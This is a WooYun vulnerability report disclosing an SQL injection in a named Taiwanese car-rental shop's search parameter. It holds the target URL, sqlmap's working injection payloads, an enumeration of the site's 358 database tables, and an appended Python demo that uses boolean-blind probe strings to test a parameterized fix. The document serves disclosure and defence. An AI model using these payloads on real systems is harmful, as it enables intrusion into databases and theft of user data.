
Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0104028

Title: SQL injection at a Taiwanese car-rental company exposes a large database

Vendor: Hitcon Taiwan Internet Vulnerability Reporting Platform

Author: 路人甲

Submitted: 2015-03-29 23:00

Fixed: 2015-05-17 23:56

Published: 2015-05-17 23:56

Type: SQL injection

Severity: High

Self-assessed rank: 15

Status: handed over to a third-party partner organization (Hitcon Taiwan Internet Vulnerability Reporting Platform) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]

Tags:

Bookmarked by 4 users


Vulnerability details

Disclosure status:

2015-03-29: Details reported to the vendor; awaiting vendor handling
2015-04-02: Vendor confirmed; details visible to the vendor only
2015-04-12: Details disclosed to core white hats and relevant domain experts
2015-04-22: Details disclosed to regular white hats
2015-05-02: Details disclosed to intern white hats
2015-05-17: Details disclosed to the public

Summary:

SQL injection at a Taiwanese car-rental company exposes a large database

Details:

http://www.twxinyang.com/shop/class/index.php?catid=0&showbrandid=0&key=a&imageField.x=33&imageField.y=9
The key parameter is injectable.

Proof of vulnerability:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: key
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: catid=0&showbrandid=0&key=a') AND 9678=9678 AND ('ZRHu'='ZRHu&imageField.x=33&imageField.y=9
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: catid=0&showbrandid=0&key=a') AND (SELECT 7319 FROM(SELECT COUNT(*),CONCAT(0x3a636a733a,(SELECT (CASE WHEN (7319=7319) THEN 1 ELSE 0 END)),0x3a656f6b3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('MQhu'='MQhu&imageField.x=33&imageField.y=9
Type: UNION query
Title: MySQL UNION query (NULL) - 1 column
Payload: catid=0&showbrandid=0&key=a') LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a636a733a,0x4e724274516a7242585a,0x3a656f6b3a)#&imageField.x=33&imageField.y=9
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: catid=0&showbrandid=0&key=a') AND SLEEP(5) AND ('UAcu'='UAcu&imageField.x=33&imageField.y=9
---
Database: twxinyang
[358 tables]
+---------------------------------------+
| phome_ecms_article |
| phome_ecms_article_check |
| phome_ecms_article_check_data |
| phome_ecms_article_data_1 |
| phome_ecms_article_doc |
| phome_ecms_article_doc_data |
| phome_ecms_article_doc_index |
| phome_ecms_article_index |
| phome_ecms_download |
| phome_ecms_download_check |
| phome_ecms_download_check_data |
| phome_ecms_download_data_1 |
| phome_ecms_download_doc |
| phome_ecms_download_doc_data |
| phome_ecms_download_doc_index |
| phome_ecms_download_index |
| phome_ecms_flash |
| phome_ecms_flash_check |
| phome_ecms_flash_check_data |
| phome_ecms_flash_data_1 |
| phome_ecms_flash_doc |
| phome_ecms_flash_doc_data |
| phome_ecms_flash_doc_index |
| phome_ecms_flash_index |
| phome_ecms_hotel |
| phome_ecms_hotel_check |
| phome_ecms_hotel_check_data |
| phome_ecms_hotel_data_1 |
| phome_ecms_hotel_doc |
| phome_ecms_hotel_doc_data |
| phome_ecms_hotel_doc_index |
| phome_ecms_hotel_index |
| phome_ecms_info |
| phome_ecms_info_check |
| phome_ecms_info_check_data |
| phome_ecms_info_data_1 |
| phome_ecms_info_doc |
| phome_ecms_info_doc_data |
| phome_ecms_info_doc_index |
| phome_ecms_info_index |
| phome_ecms_infoclass_article |
| phome_ecms_infoclass_download |
| phome_ecms_infoclass_flash |
| phome_ecms_infoclass_hotel |
| phome_ecms_infoclass_info |
| phome_ecms_infoclass_movie |
| phome_ecms_infoclass_news |
| phome_ecms_infoclass_photo |
| phome_ecms_infoclass_shop |
| phome_ecms_infotmp_article |
| phome_ecms_infotmp_download |
| phome_ecms_infotmp_flash |
| phome_ecms_infotmp_hotel |
| phome_ecms_infotmp_info |
| phome_ecms_infotmp_movie |
| phome_ecms_infotmp_news |
| phome_ecms_infotmp_photo |
| phome_ecms_infotmp_shop |
| phome_ecms_movie |
| phome_ecms_movie_check |
| phome_ecms_movie_check_data |
| phome_ecms_movie_data_1 |
| phome_ecms_movie_doc |
| phome_ecms_movie_doc_data |
| phome_ecms_movie_doc_index |
| phome_ecms_movie_index |
| phome_ecms_news |
| phome_ecms_news_check |
| phome_ecms_news_check_data |
| phome_ecms_news_data_1 |
| phome_ecms_news_doc |
| phome_ecms_news_doc_data |
| phome_ecms_news_doc_index |
| phome_ecms_news_index |
| phome_ecms_photo |
| phome_ecms_photo_check |
| phome_ecms_photo_check_data |
| phome_ecms_photo_data_1 |
| phome_ecms_photo_doc |
| phome_ecms_photo_doc_data |
| phome_ecms_photo_doc_index |
| phome_ecms_photo_index |
| phome_ecms_shop |
| phome_ecms_shop_check |
| phome_ecms_shop_check_data |
| phome_ecms_shop_data_1 |
| phome_ecms_shop_doc |
| phome_ecms_shop_doc_data |
| phome_ecms_shop_doc_index |
| phome_ecms_shop_index |
| phome_enewsad |
| phome_enewsadclass |
| phome_enewsadminstyle |
| phome_enewsbefrom |
| phome_enewsbq |
| phome_enewsbqclass |
| phome_enewsbqtemp |
| phome_enewsbqtemp_2 |
| phome_enewsbqtempclass |
| phome_enewsbuybak |
| phome_enewsbuygroup |
| phome_enewscard |
| phome_enewsclass |
| phome_enewsclass_stats |
| phome_enewsclass_stats_ip |
| phome_enewsclass_stats_set |
| phome_enewsclassadd |
| phome_enewsclassf |
| phome_enewsclassnavcache |
| phome_enewsclasstemp |
| phome_enewsclasstemp_2 |
| phome_enewsclasstempclass |
| phome_enewsdiggips |
| phome_enewsdo |
| phome_enewsdolog |
| phome_enewsdownerror |
| phome_enewsdownrecord |
| phome_enewsdownurlqz |
| phome_enewserrorclass |
| phome_enewsf |
| phome_enewsfava |
| phome_enewsfavaclass |
| phome_enewsfeedback |
| phome_enewsfeedbackclass |
| phome_enewsfeedbackf |
| phome_enewsfile_1 |
| phome_enewsfile_member |
| phome_enewsfile_other |
| phome_enewsfile_public |
| phome_enewsgbook |
| phome_enewsgbookclass |
| phome_enewsgfenip |
| phome_enewsgroup |
| phome_enewshmsg |
| phome_enewshnotice |
| phome_enewshy |
| phome_enewshyclass |
| phome_enewsindexpage |
| phome_enewsinfoclass |
| phome_enewsinfotype |
| phome_enewsinfovote |
| phome_enewsjstemp |
| phome_enewsjstemp_2 |
| phome_enewsjstempclass |
| phome_enewskey |
| phome_enewskeyclass |
| phome_enewslink |
| phome_enewslinkclass |
| phome_enewslinktmp |
| phome_enewslisttemp |
| phome_enewslisttemp_2 |
| phome_enewslisttempclass |
| phome_enewslog |
| phome_enewsloginfail |
| phome_enewsmember |
| phome_enewsmember_connect |
| phome_enewsmember_connect_app |
| phome_enewsmemberadd |
| phome_enewsmemberf |
| phome_enewsmemberfeedback |
| phome_enewsmemberform |
| phome_enewsmembergbook |
| phome_enewsmembergroup |
| phome_enewsmemberpub |
| phome_enewsmenu |
| phome_enewsmenuclass |
| phome_enewsmod |
| phome_enewsnewstemp |
| phome_enewsnewstemp_2 |
| phome_enewsnewstempclass |
| phome_enewsnotcj |
| phome_enewsnotice |
| phome_enewspage |
| phome_enewspageclass |
| phome_enewspagetemp |
| phome_enewspagetemp_2 |
| phome_enewspayapi |
| phome_enewspayrecord |
| phome_enewspic |
| phome_enewspicclass |
| phome_enewspl_1 |
| phome_enewspl_set |
| phome_enewsplayer |
| phome_enewsplf |
| phome_enewspltemp |
| phome_enewspltemp_2 |
| phome_enewspostdata |
| phome_enewspostserver |
| phome_enewsprinttemp |
| phome_enewsprinttemp_2 |
| phome_enewspublic |
| phome_enewspublic_update |
| phome_enewspubtemp |
| phome_enewspubtemp_2 |
| phome_enewspubvar |
| phome_enewspubvarclass |
| phome_enewsqmsg |
| phome_enewssearch |
| phome_enewssearchall |
| phome_enewssearchall_load |
| phome_enewssearchtemp |
| phome_enewssearchtemp_2 |
| phome_enewssearchtempclass |
| phome_enewsshop_address |
| phome_enewsshop_ddlog |
| phome_enewsshop_precode |
| phome_enewsshop_set |
| phome_enewsshopdd |
| phome_enewsshopdd_add |
| phome_enewsshoppayfs |
| phome_enewsshopps |
| phome_enewssp |
| phome_enewssp_1 |
| phome_enewssp_2 |
| phome_enewssp_3 |
| phome_enewssp_3_bak |
| phome_enewsspacestyle |
| phome_enewsspclass |
| phome_enewssql |
| phome_enewstable |
| phome_enewstags |
| phome_enewstagsclass |
| phome_enewstagsdata |
| phome_enewstask |
| phome_enewstempbak |
| phome_enewstempdt |
| phome_enewstempgroup |
| phome_enewstempvar |
| phome_enewstempvar_2 |
| phome_enewstempvarclass |
| phome_enewstogzts |
| phome_enewsuser |
| phome_enewsuseradd |
| phome_enewsuserclass |
| phome_enewsuserjs |
| phome_enewsuserjsclass |
| phome_enewsuserlist |
| phome_enewsuserlistclass |
| phome_enewsuserloginck |
| phome_enewsvote |
| phome_enewsvotemod |
| phome_enewsvotetemp |
| phome_enewsvotetemp_2 |
| phome_enewswapstyle |
| phome_enewswfinfo |
| phome_enewswfinfolog |
| phome_enewswords |
| phome_enewsworkflow |
| phome_enewsworkflowitem |
| phome_enewswriter |
| phome_enewsyh |
| phome_enewszt |
| phome_enewsztadd |
| phome_enewsztclass |
| phome_enewsztf |
| phome_enewsztinfo |
| phome_enewszttype |
| phome_enewszttypeadd |
| pwn_advs_duilian |
| pwn_advs_lb |
| pwn_advs_lbgroup |
| pwn_advs_link |
| pwn_advs_linkgroup |
| pwn_advs_logo |
| pwn_advs_movi |
| pwn_advs_pic |
| pwn_advs_pop |
| pwn_advs_text |
| pwn_base_admin |
| pwn_base_adminauth |
| pwn_base_adminmenu |
| pwn_base_adminrights |
| pwn_base_border |
| pwn_base_coltype |
| pwn_base_config |
| pwn_base_pageset |
| pwn_base_pagetemp |
| pwn_base_plus |
| pwn_base_plusdefault |
| pwn_base_plusplan |
| pwn_base_plusplanid |
| pwn_base_plustemp |
| pwn_base_version |
| pwn_comment |
| pwn_comment_cat |
| pwn_comment_config |
| pwn_feedback |
| pwn_feedback_group |
| pwn_feedback_info |
| pwn_hz_cat |
| pwn_hz_con |
| pwn_hz_config |
| pwn_hz_mzone |
| pwn_hz_order |
| pwn_hz_orderitems |
| pwn_hz_pages |
| pwn_hz_prop |
| pwn_job |
| pwn_job_form |
| pwn_job_telent |
| pwn_member |
| pwn_member_buylist |
| pwn_member_cat |
| pwn_member_centlog |
| pwn_member_centrule |
| pwn_member_centset |
| pwn_member_config |
| pwn_member_defaultrights |
| pwn_member_fav |
| pwn_member_friends |
| pwn_member_group |
| pwn_member_msn |
| pwn_member_notice |
| pwn_member_nums |
| pwn_member_onlinepay |
| pwn_member_pay |
| pwn_member_paycenter |
| pwn_member_regstep |
| pwn_member_rights |
| pwn_member_secure |
| pwn_member_type |
| pwn_member_zone |
| pwn_menu |
| pwn_menu_group |
| pwn_news_cat |
| pwn_news_con |
| pwn_news_config |
| pwn_news_downlog |
| pwn_news_pages |
| pwn_news_pcat |
| pwn_news_proj |
| pwn_news_prop |
| pwn_page |
| pwn_page_group |
| pwn_shop_brand |
| pwn_shop_brandcat |
| pwn_shop_cat |
| pwn_shop_con |
| pwn_shop_config |
| pwn_shop_memberprice |
| pwn_shop_order |
| pwn_shop_orderitems |
| pwn_shop_pages |
| pwn_shop_pricerule |
| pwn_shop_prop |
| pwn_shop_vcat |
| pwn_shop_yun |
| pwn_shop_yunzone |
| pwn_tools_code |
| pwn_tools_photopolldata |
| pwn_tools_photopollindex |
| pwn_tools_pollconfig |
| pwn_tools_polldata |
| pwn_tools_pollindex |
| pwn_tools_statbase |
| pwn_tools_statcome |
| pwn_tools_statcount |
| pwn_tools_statdate |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+

Remediation:

Filter the input.
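The report's one-word remedy, filtering, is weaker than the standard fix for this bug class, which is to bind the search keyword as a query parameter so it can never change the structure of the statement. The following is an added example, not code from the report or from the affected site. It is written in Python with an in-memory SQLite database so that it runs stand-alone; the site itself is PHP on MySQL, where the equivalent of the hardened function is a PDO prepared statement. The table name shop, the product rows and the two probe strings are all constructed for the example; the probe pair only mirrors the shape of the boolean-based blind payload sqlmap printed above (close the quote and parenthesis, add a condition, re-open so the application's trailing characters still balance).

```python
import sqlite3

# Constructed sample catalogue standing in for the shop's product table; not data from the site.
SAMPLE_PRODUCTS = [
    ("compact car", 1),
    ("family van", 1),
    ("cargo truck", 2),
]

# Constructed boolean-blind probe pair. The two strings differ only in the condition 1=1 vs 1=2;
# if the application evaluates that condition as SQL, the two searches return different rows.
PROBE_TRUE = "%') AND 1=1 AND ('1%'='1"
PROBE_FALSE = "%') AND 1=2 AND ('1%'='1"


def make_db():
    """In-memory SQLite database holding the constructed catalogue."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE shop (name TEXT, catid INTEGER)")
    conn.executemany("INSERT INTO shop VALUES (?, ?)", SAMPLE_PRODUCTS)
    return conn


def search_vulnerable(conn, key):
    """The defective pattern: the keyword is spliced into the SQL text.

    With key = PROBE_TRUE the statement becomes
      SELECT name FROM shop WHERE (name LIKE '%%') AND 1=1 AND ('1%'='1%')
    so the supplied condition is parsed and evaluated by the database.
    """
    sql = "SELECT name FROM shop WHERE (name LIKE '%" + key + "%')"
    return [row[0] for row in conn.execute(sql)]


def search_parameterized(conn, key):
    """The fix: the keyword is bound as a parameter and can only ever be matched as text.

    The same probe string is now just an (unmatched) LIKE pattern; the statement's
    structure is fixed before any user data reaches the database.
    """
    sql = "SELECT name FROM shop WHERE (name LIKE ?)"
    return [row[0] for row in conn.execute(sql, ("%" + key + "%",))]


def is_injectable(search, conn):
    """Defender-side regression check for a search function.

    Returns True when the TRUE and FALSE probes yield different result sets, i.e. the
    injected condition was evaluated; a correctly parameterized search returns the same
    (empty) result for both, because neither probe is a substring of any product name.
    """
    return search(conn, PROBE_TRUE) != search(conn, PROBE_FALSE)


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable search injectable:", is_injectable(search_vulnerable, conn))      # True
    print("parameterized search injectable:", is_injectable(search_parameterized, conn))  # False
```

Running the file prints both verdicts. The is_injectable check is the same differential sqlmap uses for boolean-based blind detection, and it is cheap enough to keep as a regression test on any search endpoint. Filtering or escaping the keyword narrows the surface but leaves the string-splicing pattern in place; binding the parameter removes the bug class entirely. The numeric parameters in the original URL (catid, showbrandid) should likewise be cast to integers or bound, rather than interpolated.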

Copyright notice: when reposting, please credit the source: 路人甲@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 15

Confirmed: 2015-04-02 23:55

Vendor reply:

Thank you for the report.

Latest status:

None yet